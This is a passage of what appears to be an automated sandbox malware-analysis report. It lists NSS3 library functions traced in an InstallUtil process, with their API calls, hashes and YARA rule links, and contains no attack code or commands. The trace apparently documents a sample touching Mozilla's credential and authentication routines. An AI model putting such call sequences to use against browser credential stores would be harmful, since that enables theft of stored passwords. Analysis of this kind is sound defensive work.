                                                                                                                  • Instruction Fuzzy Hash: B7816BB5A002099FEB14CF59DA85BAB77F9BF88308F144478E815AB751DB30E814CBA1
                                                                                                                  Function 6C7BCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7BDAE2,?), ref: 6C7BC6C2
                                                                                                                  • PR_Now.NSS3 ref: 6C7BCD35
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                    • Part of subcall function 6C7A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C751C6F,00000000,00000004,?,?), ref: 6C7A6C3F
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C7BCD54
                                                                                                                    • Part of subcall function 6C819BF0: TlsGetValue.KERNEL32(?,?,?,6C860A75), ref: 6C819C07
                                                                                                                    • Part of subcall function 6C7A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C751CCC,00000000,00000000,?,?), ref: 6C7A729F
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7BCD9B
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C7BCE0B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7BCE2C
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C7BCE40
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaMark_Util.NSS3(?,6C7BCD93,?), ref: 6C7BCEEE
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7BCD93,?), ref: 6C7BCEFC
                                                                                                                    • Part of subcall function 6C7BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7BCD93,?), ref: 6C7BCF0B
                                                                                                                    • Part of subcall function 6C7BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7BCD93,?), ref: 6C7BCF1D
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF47
                                                                                                                    • Part of subcall function 6C7BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF67
                                                                                                                    • Part of subcall function 6C7BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C7BCD93,?,?,?,?,?,?,?,?,?,?,?,6C7BCD93,?), ref: 6C7BCF78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3748922049-0
                                                                                                                  • Opcode ID: 70bef20ec1b47ebd271e90f54404b4576c055748dc4f8e0739632adf89d90216
                                                                                                                  • Instruction ID: 6717b81eeca627a9c991900dbb952b430db25aea0219f8ffedaff12a843b3da8
                                                                                                                  • Opcode Fuzzy Hash: 70bef20ec1b47ebd271e90f54404b4576c055748dc4f8e0739632adf89d90216
                                                                                                                  • Instruction Fuzzy Hash: ED51B3B6A001019BE710DF69DE45BAA73E8EF48349F258534E855B7B40EB31E905CB91
                                                                                                                  Function 6C78EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C78EF38
                                                                                                                    • Part of subcall function 6C779520: PK11_IsLoggedIn.NSS3(00000000,?,6C7A379E,?,00000001,?), ref: 6C779542
                                                                                                                  • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C78EF53
                                                                                                                    • Part of subcall function 6C794C20: TlsGetValue.KERNEL32 ref: 6C794C4C
                                                                                                                    • Part of subcall function 6C794C20: EnterCriticalSection.KERNEL32(?), ref: 6C794C60
                                                                                                                    • Part of subcall function 6C794C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CA1
                                                                                                                    • Part of subcall function 6C794C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C794CBE
                                                                                                                    • Part of subcall function 6C794C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C794CD2
                                                                                                                    • Part of subcall function 6C794C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C794D3A
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C78EF9E
                                                                                                                    • Part of subcall function 6C819BF0: TlsGetValue.KERNEL32(?,?,?,6C860A75), ref: 6C819C07
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C78EFC3
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C78F016
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C78F022
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2459274275-0
                                                                                                                  • Opcode ID: 4d11098a5dfaf0a36d50d62931eecb67b6038df234073504aed05a5df221d1e0
                                                                                                                  • Instruction ID: 31307c8dfc03d42d246cfd6a75f1703efa9fdcfb00a3c55a32b72795c44b7b52
                                                                                                                  • Opcode Fuzzy Hash: 4d11098a5dfaf0a36d50d62931eecb67b6038df234073504aed05a5df221d1e0
                                                                                                                  • Instruction Fuzzy Hash: EF41A2B1E0110AAFDF018FA9DD48BEE7BB9AF48358F104035FA14A6350E771C915CBA1
                                                                                                                  Function 6C764860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C764894
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7648CA
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7648DD
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C7648FF
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C764912
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C76494A
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 759476665-0
                                                                                                                  • Opcode ID: 37c5658139759f8869387dda5cacbb8bd62c6abaff5db374d52f550ae067d55d
                                                                                                                  • Instruction ID: 4637a5bed919dd3ac307a4cfec18828fb7b19087dbe22913172a12020bd03982
                                                                                                                  • Opcode Fuzzy Hash: 37c5658139759f8869387dda5cacbb8bd62c6abaff5db374d52f550ae067d55d
                                                                                                                  • Instruction Fuzzy Hash: 2A41C3716043065BE704CA6BDA94BAB77E89B44318F04053CEE5597F41F770E908D752
                                                                                                                  Function 6C77CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(00000060), ref: 6C77CF80
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C77D002
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C77D016
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C77D025
                                                                                                                  • PR_NewLock.NSS3 ref: 6C77D043
                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C77D074
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3361105336-0
                                                                                                                  • Opcode ID: b9b8e0aafb2d275907417f3fb9d06615fe9f16f6b9d2a65e762898a722a07a41
                                                                                                                  • Instruction ID: 558e11af274bedd3b9ba66a3158cbb4f70f8de13b2af6d0bbac691fbd7ef2f10
                                                                                                                  • Opcode Fuzzy Hash: b9b8e0aafb2d275907417f3fb9d06615fe9f16f6b9d2a65e762898a722a07a41
                                                                                                                  • Instruction Fuzzy Hash: 3841D2B0A012098FDF20DF29CA8839A7BE4EF18319F105179DC188BB46D770C885CBB5
                                                                                                                  Function 6C7665D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_Alloc_Util.NSS3(-00000007), ref: 6C76660F
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C766660
                                                                                                                  • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C76667B
                                                                                                                  • SGN_DecodeDigestInfo.NSS3(?), ref: 6C76669B
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C7666B0
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7666C8
                                                                                                                    • Part of subcall function 6C7925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?,?), ref: 6C792670
                                                                                                                    • Part of subcall function 6C7925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C76662E,?), ref: 6C792684
                                                                                                                    • Part of subcall function 6C7925D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926C2
                                                                                                                    • Part of subcall function 6C7925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C7926E0
                                                                                                                    • Part of subcall function 6C7925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7926F4
                                                                                                                    • Part of subcall function 6C7925D0: PR_Unlock.NSS3(?), ref: 6C79274D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2025608128-0
                                                                                                                  • Opcode ID: b24572aa2363bee507bc35ac0d713db8999171a2a8de3a2b7d54db3be72a8d09
                                                                                                                  • Instruction ID: b2faf9ddf3f36ffaba27b74f7300041730f22c8c1406cc031f426291e86d1b40
                                                                                                                  • Opcode Fuzzy Hash: b24572aa2363bee507bc35ac0d713db8999171a2a8de3a2b7d54db3be72a8d09
                                                                                                                  • Instruction Fuzzy Hash: B33161B5A012199BDB00CFA9E985AAE77F4EF49358F540138ED15E7B00E731EA14CBE1
                                                                                                                  Function 6C762E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C752D1A), ref: 6C762E7E
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C758298,?,?,?,6C74FCE5,?), ref: 6C7B07BF
                                                                                                                    • Part of subcall function 6C7B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7B07E6
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B081B
                                                                                                                    • Part of subcall function 6C7B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B0825
                                                                                                                  • PR_Now.NSS3 ref: 6C762EDF
                                                                                                                  • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C762EE9
                                                                                                                  • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C752D1A), ref: 6C762F01
                                                                                                                  • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C752D1A), ref: 6C762F50
                                                                                                                  • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C762F81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 287051776-0
                                                                                                                  • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                  • Instruction ID: d38ce1f1f9b74cbb9324a596d1304db05c6c4789eb63fbd28de87a216f411b9d
                                                                                                                  • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                  • Instruction Fuzzy Hash: B731257150110087E790C667CE4CFEEB269EF90358F64097ADC29A7ED1EB31998ACB51
                                                                                                                  Function 6C750E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CERT_DecodeAVAValue.NSS3(?,?,6C750A2C), ref: 6C750E0F
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C750A2C), ref: 6C750E73
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C750A2C), ref: 6C750E85
                                                                                                                  • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C750A2C), ref: 6C750E90
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C750EC4
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C750A2C), ref: 6C750ED9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3618544408-0
                                                                                                                  • Opcode ID: a85fd771907d4a21d81bf9bd046a43f4ae354155257c8f335c0c30c2f13a581b
                                                                                                                  • Instruction ID: 3d968e8bb638e7aff79885ef0ce2dfe9093a8a71ec41694c019bf55dfbbbc257
                                                                                                                  • Opcode Fuzzy Hash: a85fd771907d4a21d81bf9bd046a43f4ae354155257c8f335c0c30c2f13a581b
                                                                                                                  • Instruction Fuzzy Hash: 92212C73F0028457EB1069769E49B6B72AEDBC274CFAD4439D81867A02FE61C83482A1
                                                                                                                  Function 6C7688D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C770725,00000000,00000058), ref: 6C768906
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C76891A
                                                                                                                  • PL_ArenaAllocate.NSS3(?,?), ref: 6C76894A
                                                                                                                  • calloc.MOZGLUE(00000001,6C77072D,00000000,00000000,00000000,?,6C770725,00000000,00000058), ref: 6C768959
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C768993
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7689AF
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1716546843-0
                                                                                                                  • Opcode ID: e8a0cf212e3798e3ad1df4f4e287134d656e1a67d72b546073c16867bf65088d
                                                                                                                  • Instruction ID: 4bc574bd323bfa8980f04cbfbba283dd10021d9c88835b972bdf45b021f5cbfd
                                                                                                                  • Opcode Fuzzy Hash: e8a0cf212e3798e3ad1df4f4e287134d656e1a67d72b546073c16867bf65088d
                                                                                                                  • Instruction Fuzzy Hash: E8313772E00211ABD7008F2ADD45A5ABBA8AF0631CF158536EC18DBF02E732E845C7D2
                                                                                                                  Function 6C75AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C75AEB3
                                                                                                                  • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C75AECA
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75AEDD
                                                                                                                  • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C75AF02
                                                                                                                  • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C879500), ref: 6C75AF23
                                                                                                                    • Part of subcall function 6C7AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7AF0C8
                                                                                                                    • Part of subcall function 6C7AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7AF122
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C75AF37
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
